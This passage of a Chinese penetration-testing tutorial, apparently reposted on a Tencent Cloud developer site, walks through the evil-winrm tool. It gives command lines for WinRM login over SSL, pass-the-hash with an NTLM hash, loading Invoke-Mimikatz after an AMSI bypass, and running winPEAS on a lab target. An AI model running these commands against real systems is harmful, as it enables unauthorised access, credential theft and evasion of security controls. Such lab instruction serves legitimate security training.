已经成功建立起远程会话。</p><p><strong>启动SSL加密的登录:</strong></p><p>为了增强远程会话的安全性，可以使用Evil-winrm工具通过SSL加密WinRM连接。当启用SSL功能时，所有传输的数据都将被加密，这有助于保护会话免受中间人攻击和其他网络层面的威胁。</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言：</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数：<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:95.16%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/7fc49f928a8e4c7f9a4835937cc5f927.png" alt="" style="width:100%"/></div></div></div></figure><p><strong>NTLM哈希登录：</strong></p><p>可以通过利用evil-winrm工具执行传递哈希攻击（Pass-The-Hash）来建立PowerShell会话。这种攻击方式允许攻击者使用NTLM哈希值而不是纯文本密码进行远程登录。以下是执行此类攻击的完整命令示例：</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言：</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数：<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:96.22%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/cb7a6515397d2c688d637854b3872afc.png" alt="" style="width:100%"/></div></div></div></figure><p>执行PowerShell脚本：</p><p>Evil-winrm还允许用户直接从本地机器加载PowerShell脚本到目标机器的内存中，同时提供绕过AMSI的功能。</p><p>脚本获取来源:</p><p><strong>https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1</strong></p><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:95.16%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/530dde0b0aab03a08634ba06ec79abba.png" alt="" style="width:100%"/></div></div></div></figure><p>使用以下命令可以加载并执行Mimikatz脚本：</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言：</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数：<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0"></code></pre></div></div><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言：</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数：<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell Bypass-4MSI Invoke-Mimikatz.ps1 </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/fcfa74083d5efbc77190adc1704cc167.png" alt="" style="width:100%"/></div></div></div></figure><p>日志存储与可执行文件运行：</p><p>Evil-winrm还提供了日志存储功能，方便在CTF比赛或渗透测试中保存操作记录。同时，它还能在PowerShell会话中运行exe可执行文件，为攻击者提供了极大的便利。</p><p><strong>日志存储：</strong></p><p>允许通过 <code>-l</code> 标志将所有日志保存到本地机器</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言：</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数：<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/90887e058d889ab20026c22a8154457a.png" alt="" style="width:100%"/></div></div></div></figure><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/1a8bf1f749f5242188b038372bba6f73.png" alt="" style="width:100%"/></div></div></div></figure><p><strong>运行可执行文件：</strong> </p><p>提供了一个存储在本地机器中的 <code>WinPEAS.exe</code> 可执行文件的路径</p><div class="rno-markdown-code"><div class="rno-markdown-code-toolbar"><div class="rno-markdown-code-toolbar-info"><div class="rno-markdown-code-toolbar-item is-type"><span class="is-m-hidden">代码语言：</span>javascript</div><div class="rno-markdown-code-toolbar-item is-num"><i class="icon-code"></i><span class="is-m-hidden">代码</span>运行次数：<!-- -->0</div></div><div class="rno-markdown-code-toolbar-opt"><div class="rno-markdown-code-toolbar-copy"><i class="icon-copy"></i><span class="is-m-hidden">复制</span></div><button class="rno-markdown-code-toolbar-run"><i class="icon-run"></i><span class="is-m-hidden">Cloud Studio</span> 代码运行</button></div></div><div class="developer-code-block"><pre class="prism-token token line-numbers language-javascript"><code class="language-javascript" style="margin-left:0">evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc Bypass-4MSI menu Invoke-Binary /opt/privsc/winPEASx64.exe </code></pre></div></div><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/ead10960b12a27fa34a92e786c48e70d.png" alt="" style="width:100%"/></div></div></div></figure><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/c0ead9f3ddd599b1cd45c0ef0d035f25.png" alt="" style="width:100%"/></div></div></div></figure><p>服务枚举与文件传输：</p><p>Evil-winrm能够列出目标系统中运行的所有服务，帮助攻击者识别未被其他工具检测到的服务。此外，它还支持文件的上传和下载，简化了在目标系统和攻击者机器之间的文件传输过程。</p><p><strong>服务枚举：</strong></p><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:100%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/b3d5b3731a4e46b9b57aa183833eb7e8.png" alt="" style="width:100%"/></div></div></div></figure><p><strong>文件传输：</strong></p><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:96.07%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/33e62467913e729617b97daf99c55906.png" alt="" style="width:100%"/></div></div></div></figure><figure class=""><div class="rno-markdown-img-url" style="text-align:center"><div class="rno-markdown-img-url-inner" style="width:95.76%"><div style="width:100%"><img src="https://developer.qcloudimg.com/http-save/yehe-2017757/f50957d563ecdca3f5dcd4ee01eee0c2.png" alt="" style="width:100%"/></div></div></div></figure><p>总结</p><p>Evil-winrm是一个功能强大的渗透测试工具，它通过多种登录方式、脚本执行、日志存储等功能，极大地简化了渗透测试的过程。随着网络安全威胁的不断演变，工具如Evil-winrm在安全专家和渗透测试人员的工具箱中扮演着越来越重要的角色。</p></div></div></div><div class="mod-content__source"><div class="mod-content__source-inner"><div class="mod-content__source-title">本文参与 <a href="/developer/support-plan" target="_blank">腾讯云自媒体同步曝光计划</a>，分享自微信公众号。</div><div class="mod-content__source-desc">原始发表：2024-11-26<!-- -->，如有侵权请联系 <a href="mailto:cloudcommunity@tencent.com">cloudcommunity@tencent.com</a> 删除</div></div><div class="mod-content__source-qr"></div></div><div class="mod-statement-m"><div class="cdc-tag__list mod-content__tags" track-click=""><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/16545" target="_blank">tools</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/17276" target="_blank">工具</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/17287" target="_blank">管理</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/17592" target="_blank">终端</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/10672" target="_blank">黑客</a></div></div><div class="mod-content__statement"><p>本文分享自 <span>释然IT杂谈</span> 微信公众号，<span style="color:#0052d9">前往查看</span></p><p>如有侵权，请联系 <a href="mailto:cloudcommunity@tencent.com">cloudcommunity@tencent.com</a> 删除。</p><p class="mod-content__statement-tip">本文参与 <a href="/developer/support-plan" target="_blank">腾讯云自媒体同步曝光计划</a>  ，欢迎热爱写作的你一起参与！</p></div></div><div class="cdc-tag__list mod-content__tags" track-click=""><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/16545" target="_blank">tools</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/17276" target="_blank">工具</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/17287" target="_blank">管理</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/17592" target="_blank">终端</a></div><div class="cdc-tag" track-click="" track-exposure=""><a class="cdc-tag__inner" href="/developer/tag/10672" target="_blank">黑客</a></div></div></div></div><div class="mod-article-content is-pill-hidden"><div class="mod-comment"><div class="mod-relevant__title">评论</div><div class="cdc-comment-response"><div class="cdc-comment-response-single-edit not-logged"><div class="cdc-comment-response-single-edit__inner"><span class="cdc-avatar cdc-comment-response-single-edit__avatar cdc-comment__avatar circle"><span class="cdc-avatar__inner" style="background-image:url(https://qcloudimg.tencent-cloud.cn/raw/2eca91c9c29816ff056d22815949d83c.png)" target="_blank"></span></span><div class="cdc-comment-response-single-edit__main"><span>登录</span>后参与评论</div></div></div><div class="cdc-comment-response__toolbar"><div class="cdc-comment-response__number">0<!-- --> 条评论</div><div class="cdc-comment-response__segment"><div class="cdc-comment-response__segment-item is-active">热度</div><div class="cdc-comment-response__segment-item">最新</div></div></div><div class="cdc-comment-response-inner"><div class="cdc-comment-response__body"><div><div class="cdc-loading"><div class="cdc-loading__inner"><div class="cdc-loading__item one"></div><div class="cdc-loading__item two"></div><div class="cdc-loading__item three"></div></div></div></div></div></div><div class="cdc-operate-footer"><div class="cdc-operate-footer__inner"><div class="cdc-operate-footer__toggle is-logout"><div class="cdc-operate-footer__toggle-text"><span>登录 </span>后参与评论</div></div></div></div></div></div></div><div class="mod-article-content recommend"><div class="mod-relevant" qct-area="推荐阅读" qct-exposure=""><div class="mod-relevant__title recommend-read">推荐阅读</div><div class="t-divider t-divider--horizontal" style="margin-bottom:0;margin-top:10px"></div></div></div></div><div class="cdc-layout__side"><div class="cdc-personal-info2 mod-author"><div class="cdc-personal-info2__inner"><div class="cdc-personal-info2__detail"><div class="cdc-personal-info2__main"><div class="cdc-personal-info2__name"><a href="/developer/user/2017757" target="_blank" class="cdc-personal-info2__name-text"></a></div><div class="cdc-personal-info2__level"><div class="cdc-personal-info2__level-number">LV.</div><div class="cdc-emblems cdc-personal-info2__level-emblems"></div></div><div class="cdc-personal-info2__position"></div></div><div class="cdc-personal-info2__avatar"></div></div><div class="cdc-personal-info2__list"><a class="cdc-personal-info2__item" href="/developer/user/undefined/articles" target="_blank"><div class="cdc-personal-info2__item-text">文章</div><div class="cdc-personal-info2__item-number">0</div></a><a class="cdc-personal-info2__item" href="/developer/user/undefined" target="_blank"><div class="cdc-personal-info2__item-text">获赞</div><div class="cdc-personal-info2__item-number">0</div></a></div></div></div><div class="mod-sticky-act"><div class="cdc-mod-product2"><div class="cdc-card" qct-exposure="" qct-area="相关产品与服务"><div class="cdc-card__inner"><div class="cdc-card__hd"><div class="cdc-card__title">相关产品与服务</div><div class="cdc-mod-product2-pagination"><span class="pagination-prev disabled"></span><span class="pagination-next "></span></div></div><div class="cdc-card__bd"><div class="cdc-product-info2__list"><div class="cdc-product-info2"><div class="cdc-product-info2__card-main"><div class="cdc-product-info2__card-name">网站渗透测试</div><div class="cdc-product-info2__card-desc">网站渗透测试（Website Penetration Test，WPT）是完全模拟黑客可能使用的攻击技术和漏洞发现技术，对目标系统的安全做深入的探测，发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权，采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点，帮助管理者知道自己网络所面临的问题，同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行，我们提供黑盒、白盒、灰盒多种测试方案，更全面更深入的发现客户的潜在风险。</div><div class="cdc-product-info2__card-list"><a target="_blank" href="https://cloud.tencent.com/product/wpt?from=21341&amp;from_column=21341"><i class="product-icon introduce-icon"></i>产品介绍</a></div></div><div class="cdc-product-info2__activity"><a target="_blank" href="https://cloud.tencent.com/act/pro/Featured?from=21344&amp;from_column=21344"><i class="hot-icon"></i>精选特惠 拼团嗨购</a></div></div></div></div></div></div></div></div></div></div></div></div><div class="cdc-widget-global"><div class="cdc-widget-global__btn announcement"></div><div class="cdc-widget-global__btn code"><div class="cdc-widget-global__btn-tag">领券</div></div><div class="cdc-widget-global__btn top" style="visibility:hidden"></div></div><div class="cdc-footer"><div class="cdc-footer__inner"><div class="cdc-footer__main"><div class="cdc-footer__website"><ul class="cdc-footer__website-group"><li class="cdc-footer__website-column"><div class="cdc-footer__website-box"><h3 class="cdc-footer__website-title">社区</h3><ul class="cdc-footer__website-list"><li class="cdc-footer__website-item"><a href="/developer/column">技术文章</a></li><li class="cdc-footer__website-item"><a href="/developer/ask">技术问答</a></li><li class="cdc-footer__website-item"><a href="/developer/salon">技术沙龙</a></li><li class="cdc-footer__website-item"><a href="/developer/video">技术视频</a></li><li class="cdc-footer__website-item"><a href="/developer/learning">学习中心</a></li><li class="cdc-footer__website-item"><a href="/developer/techpedia">技术百科</a></li><li class="cdc-footer__website-item"><a href="/developer/zone/list">技术专区</a></li></ul></div></li><li class="cdc-footer__website-column"><div class="cdc-footer__website-box"><h3 class="cdc-footer__website-title">活动</h3><ul class="cdc-footer__website-list"><li class="cdc-footer__website-item"><a href="/developer/support-plan">自媒体同步曝光计划</a></li><li class="cdc-footer__website-item"><a href="/developer/support-plan-invitation">邀请作者入驻</a></li><li class="cdc-footer__website-item"><a href="/developer/article/1535830">自荐上首页</a></li><li class="cdc-footer__website-item"><a href="/developer/competition">技术竞赛</a></li></ul></div></li><li class="cdc-footer__website-column"><div class="cdc-footer__website-box"><h3 class="cdc-footer__website-title">资源</h3><ul class="cdc-footer__website-list"><li class="cdc-footer__website-item"><a href="/developer/specials">技术周刊</a></li><li class="cdc-footer__website-item"><a href="/developer/tags">社区标签</a></li><li class="cdc-footer__website-item"><a href="/developer/devdocs">开发者手册</a></li><li class="cdc-footer__website-item"><a href="/lab?from=20064&amp;from_column=20064">开发者实验室</a></li></ul></div></li><li class="cdc-footer__website-column"><div class="cdc-footer__website-box"><h3 class="cdc-footer__website-title">关于</h3><ul class="cdc-footer__website-list"><li class="cdc-footer__website-item"><a rel="nofollow" href="/developer/article/1006434">社区规范</a></li><li class="cdc-footer__website-item"><a rel="nofollow" href="/developer/article/1006435">免责声明</a></li><li class="cdc-footer__website-item"><a rel="nofollow" href="mailto:cloudcommunity@tencent.com">联系我们</a></li><li class="cdc-footer__website-item"><a rel="nofollow" href="/developer/friendlink">友情链接</a></li></ul></div></li></ul></div><div class="cdc-footer__qr"><h3 class="cdc-footer__qr-title">腾讯云开发者</h3><div class="cdc-footer__qr-object"><img src="https://qcloudimg.tencent-cloud.cn/raw/a8907230cd5be483497c7e90b061b861.png?imageView2/2/w/76" class="cdc-footer__qr-image" alt="扫码关注腾讯云开发者"/></div><div class="cdc-footer__qr-infos"><p class="cdc-footer__qr-info"><span class="cdc-footer__qr-text">扫码关注腾讯云开发者</span></p><p class="cdc-footer__qr-info"><span class="cdc-footer__qr-text">领取腾讯云代金券</span></p></div></div></div><div class="cdc-footer__recommend"><div class="cdc-footer__recommend-rows"><div class="cdc-footer__recommend-cell"><h3 class="cdc-footer__recommend-title">热门产品</h3><div class="cdc-footer__recommend-wrap"><ul class="cdc-footer__recommend-list"><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="https://dnspod.cloud.tencent.com?from=20064&amp;from_column=20064">域名注册</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/cvm?from=20064&amp;from_column=20064">云服务器</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/tbaas?from=20064&amp;from_column=20064">区块链服务</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/mq?from=20064&amp;from_column=20064">消息队列</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/dsa?from=20064&amp;from_column=20064">网络加速</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/tencentdb-catalog?from=20064&amp;from_column=20064">云数据库</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/cns?from=20064&amp;from_column=20064">域名解析</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/cos?from=20064&amp;from_column=20064">云存储</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/css?from=20064&amp;from_column=20064">视频直播</a></li></ul></div></div><div class="cdc-footer__recommend-cell"><h3 class="cdc-footer__recommend-title">热门推荐</h3><div class="cdc-footer__recommend-wrap"><ul class="cdc-footer__recommend-list"><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/facerecognition?from=20064&amp;from_column=20064">人脸识别</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/tm?from=20064&amp;from_column=20064">腾讯会议</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/act/pro/enterprise2019?from=20064&amp;from_column=20064">企业云</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/cdn-scd?from=20064&amp;from_column=20064">CDN加速</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/trtc?from=20064&amp;from_column=20064">视频通话</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/tiia?from=20064&amp;from_column=20064">图像分析</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/cdb?from=20064&amp;from_column=20064">MySQL 数据库</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/symantecssl?from=20064&amp;from_column=20064">SSL 证书</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/asr?from=20064&amp;from_column=20064">语音识别</a></li></ul></div></div><div class="cdc-footer__recommend-cell"><h3 class="cdc-footer__recommend-title">更多推荐</h3><div class="cdc-footer__recommend-wrap"><ul class="cdc-footer__recommend-list"><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/solution/data_protection?from=20064&amp;from_column=20064">数据安全</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/clb?from=20064&amp;from_column=20064">负载均衡</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/sms?from=20064&amp;from_column=20064">短信</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/ocr?from=20064&amp;from_column=20064">文字识别</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/vod?from=20064&amp;from_column=20064">云点播</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="https://tm.cloud.tencent.com?from=20064&amp;from_column=20064">商标注册</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/solution/la?from=20064&amp;from_column=20064">小程序开发</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/cat?from=20064&amp;from_column=20064">网站监控</a></li><li class="cdc-footer__recommend-item"><a class="com-2-footer-recommend-link" href="/product/cdm?from=20064&amp;from_column=20064">数据迁移</a></li></ul></div></div></div></div><div class="cdc-footer__copyright"><div class="cdc-footer__copyright-text"><p>Copyright © 2013 - <!-- -->2025<!-- --> Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 </p><p>深圳市腾讯计算机系统有限公司 ICP备案/许可证号：<a href="https://beian.miit.gov.cn/#/Integrated/index" target="_blank">粤B2-20090059 </a><a href="https://www.beian.gov.cn/portal/index.do" target="_blank">深公网安备号 44030502008569</a></p><p>腾讯云计算（北京）有限责任公司 京ICP证150476号 |  <a href="https://beian.miit.gov.cn/#/Integrated/index" target="_blank">京ICP备11018762号</a> <!-- -->|<!-- --> <a href="https://www.beian.gov.cn/portal/index.do" target="_blank">京公网安备号11010802020287</a></p></div></div></div></div><div style="display:none"><a href="/developer/ask/archives.html">问题归档</a><a href="/developer/column/archives.html">专栏文章</a><a href="/developer/news/archives.html">快讯文章归档</a><a href="/developer/information/all.html">关键词归档</a><a href="/developer/devdocs/archives.html">开发者手册归档</a><a href="/developer/devdocs/sections_p1.html">开发者手册 Section 归档</a></div><div class="cdc-m-footer"><div class="cdc-m-footer__inner"><div class="cdc-m-footer__copyright"><p>Copyright © 2013 - <!-- -->2025<!-- --> Tencent Cloud.</p><p>All Rights Reserved. 腾讯云 版权所有</p></div></div></div><div class="cdc-operate-footer"><div class="cdc-operate-footer__inner"><div class="cdc-operate-footer__toggle is-logout"><div class="cdc-operate-footer__toggle-text"><span>登录 </span>后参与评论</div></div><div class="cdc-operate-footer__operations"><div class="cdc-operate-footer__operate"><i class="cdc-operate-footer__operate-icon comment"></i></div><div class="cdc-operate-footer__operate emoji"><div class="emoji-item"><span class="emoji-item-icon fire"></span></div></div><div class="cdc-operate-footer__operate"><i class="cdc-operate-footer__operate-icon book"></i></div><div class="cdc-operate-footer__operate"><i class="cdc-operate-footer__operate-icon more"></i></div></div></div></div><div class="cdc-suspend-pill"><div class="cdc-suspend-pill__inner"><button class="cdc-icon-btn cdc-suspend-pill__item emoji cdc-icon-btn--text"><div class="emoji-item"><span class="emoji-item-icon fire"></span></div><span class="cdc-suspend-pill__item-number">0</span></button><button class="cdc-icon-btn cdc-suspend-pill__item like cdc-icon-btn--text"><span class="cdc-svg-icon-con"><span class="cdc-svg-icon" style="width:24px;height:24px"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="currentcolor"><path fill-rule="evenodd" clip-rule="evenodd" d="M17.5 11.25C17.5 11.9404 16.9404 12.5 16.25 12.5C15.5596 12.5 15 11.9404 15 11.25C15 10.5596 15.5596 10 16.25 10C16.9404 10 17.5 10.5596 17.5 11.25Z M12.25 12.5C12.9404 12.5 13.5 11.9404 13.5 11.25C13.5 10.5596 12.9404 10 12.25 10C11.5596 10 11 10.5596 11 11.25C11 11.9404 11.5596 12.5 12.25 12.5Z M8.25 12.5C8.94036 12.5 9.5 11.9404 9.5 11.25C9.5 10.5596 8.94036 10 8.25 10C7.55964 10 7 10.5596 7 11.25C7 11.9404 7.55964 12.5 8.25 12.5Z M5 3C3.34315 3 2 4.34315 2 6V16C2 17.6569 3.34315 19 5 19H8.34311L10.5858 21.2426C11.3668 22.0237 12.6331 22.0237 13.4142 21.2426L15.6568 19H19C20.6569 19 22 17.6569 22 16V6C22 4.34315 20.6569 3 19 3H5ZM4 6C4 5.44772 4.44772 5 5 5H19C19.5523 5 20 5.44772 20 6V16C20 16.5523 19.5523 17 19 17H14.8284L12 19.8284L9.17154 17H5C4.44772 17 4 16.5523 4 16V6Z"></path></svg></span></span><span class="cdc-suspend-pill__item-number">0</span></button><button class="cdc-icon-btn cdc-suspend-pill__item collect cdc-icon-btn--text" qct-area="收藏文章" qct-click=""><span class="cdc-svg-icon-con"><span class="cdc-svg-icon" style="width:24px;height:24px"><svg width="24" height="24" viewBox="0 0 24 24" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M10.2057 3.11487C10.9393 1.62838 13.059 1.62838 13.7927 3.11487L15.9724 7.53141L20.8463 8.23963C22.4867 8.478 23.1418 10.4939 21.9547 11.651L18.4279 15.0888L19.2605 19.9431C19.5407 21.5769 17.8258 22.8228 16.3586 22.0514L11.9992 19.7596L7.63981 22.0514C6.17255 22.8228 4.45769 21.5769 4.73791 19.9431L5.57048 15.0888L2.04366 11.651C0.856629 10.4939 1.51165 8.478 3.15209 8.23963L8.02603 7.53141L10.2057 3.11487ZM11.9992 4L9.8195 8.41654C9.52818 9.00683 8.96504 9.41597 8.31363 9.51062L3.43969 10.2188L6.9665 13.6566C7.43787 14.1161 7.65297 14.7781 7.5417 15.4269L6.70913 20.2812L11.0685 17.9893C11.6512 17.683 12.3472 17.683 12.9299 17.9893L17.2893 20.2812L16.4567 15.4269C16.3454 14.7781 16.5605 14.1161 17.0319 13.6566L20.5587 10.2188L15.6848 9.51062C15.0333 9.41597 14.4702 9.00683 14.1789 8.41654L11.9992 4Z"></path></svg></span></span><span class="cdc-suspend-pill__item-number">0</span></button><button class="cdc-icon-btn cdc-suspend-pill__item cdc-icon-btn--text"><span class="cdc-svg-icon-con"><span class="cdc-svg-icon" style="width:24px;height:24px"><svg width="24" height="24" viewBox="0 0 24 24" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><path d="M13.0001 4V6H17.5859L10.1787 13.4072L11.6043 14.81L19.0001 7.41424V12H21.0001V4H13.0001Z"></path><path d="M3 12.9996C3 8.71646 5.99202 5.13211 10 4.22266V6.28952C7.10851 7.15007 5 9.82862 5 12.9996C5 16.8656 8.13401 19.9996 12 19.9996C15.1709 19.9996 17.8494 17.8912 18.71 14.9999H20.7769C19.8674 19.0077 16.2831 21.9996 12 21.9996C7.02944 21.9996 3 17.9702 3 12.9996Z"></path></svg></span></span></button><button class="cdc-icon-btn cdc-suspend-pill__item cdc-icon-btn--text"><span class="cdc-svg-icon-con"><span class="cdc-svg-icon" style="width:24px;height:24px"><svg width="24" height="24" viewBox="0 0 24 24" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M2 6C2 4.34315 3.34315 3 5 3H17C18.6569 3 20 4.34315 20 6V11H18V6C18 5.44772 17.5523 5 17 5H5C4.44772 5 4 5.44772 4 6V18C4 18.5523 4.44772 19 5 19H12V21H5C3.34315 21 2 19.6569 2 18V6ZM6 8H12V10H6V8ZM6 12H15V14H6V12ZM22 16H19V13H17V16H14V18H17V21H19V18H22V16Z"></path></svg></span></span></button><div class="cdc-suspend-pill__line"></div><button class="cdc-icon-btn cdc-suspend-pill__item cdc-icon-btn--text"><span class="cdc-svg-icon-con"><span class="cdc-svg-icon" style="width:24px;height:24px"><svg width="24" height="24" viewBox="0 0 24 24" fill="currentcolor" xmlns="http://www.w3.org/2000/svg"><path d="M16.5047 6H13V4H20V10.876H18V7.33313L14.4571 10.876L13.0429 9.46182L16.5047 6Z"></path><path d="M11 6.00006H7.4953L10.9571 9.46189L9.54291 10.8761L6 7.33319V10.8761H4V4.00006H11V6.00006Z"></path><path d="M7.4953 